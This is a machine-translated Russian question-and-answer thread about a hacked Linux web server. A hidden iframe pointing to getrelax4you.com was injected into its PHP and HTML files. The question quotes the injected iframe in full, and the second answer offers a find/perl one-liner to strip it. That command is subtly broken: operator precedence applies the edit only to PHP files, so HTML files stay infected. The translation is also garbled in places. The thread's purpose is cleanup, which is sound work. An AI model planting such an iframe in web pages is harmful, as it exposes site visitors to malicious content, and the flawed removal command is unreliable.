Вирус iframe, необходимо удалить из всех файлов phps и html на сервере linux

Question

Следующая строка была добавлена ​​почти ко всем php-файлам и некоторым html-файлам на моем linux-сервере. Какая команда удаляет это, не повреждая ничего другого?

iframe qoluu = 'V5pEXGSm' src= 'http://getrelax4you.com/in.cgi?7' width = '98 'height =' 407 'style =' display: none '>

Начало и конец вышеуказанной строки имеют <>

и будуткоманда поиска по всем папкам?

Answer 1

Ваш сервер был взломан, просто восстановите файлы сайта на чистом сервере из хранилища исходного кода.

Исправление любых пользовательских данных может оказаться более сложным, вы больше не можете доверять содержимомуваш БД, так что вы должны быть очень осторожны.Удачи в следующий раз.

Answer 2

Упрощенное решение, при условии, что весь вирусный код находится в одной строке:

find /www/directory -name '*.html' -o -name '*.php' -exec perl -i -ne 'print unless /getrelax4you\.com/' '{}' \;

Краткое объяснение: посетите все файлы в каталоге / www / с расширением html или php. Используйте perl для редактирования каждого файла на месте, дословно копируя все строки для вывода, если они не содержат строку «getrelax4you.com»; которые удалены.

Будьте бдительны! Сделайте резервную копию, прежде чем пытаться это; я мог пропустить некоторые мелкие детали.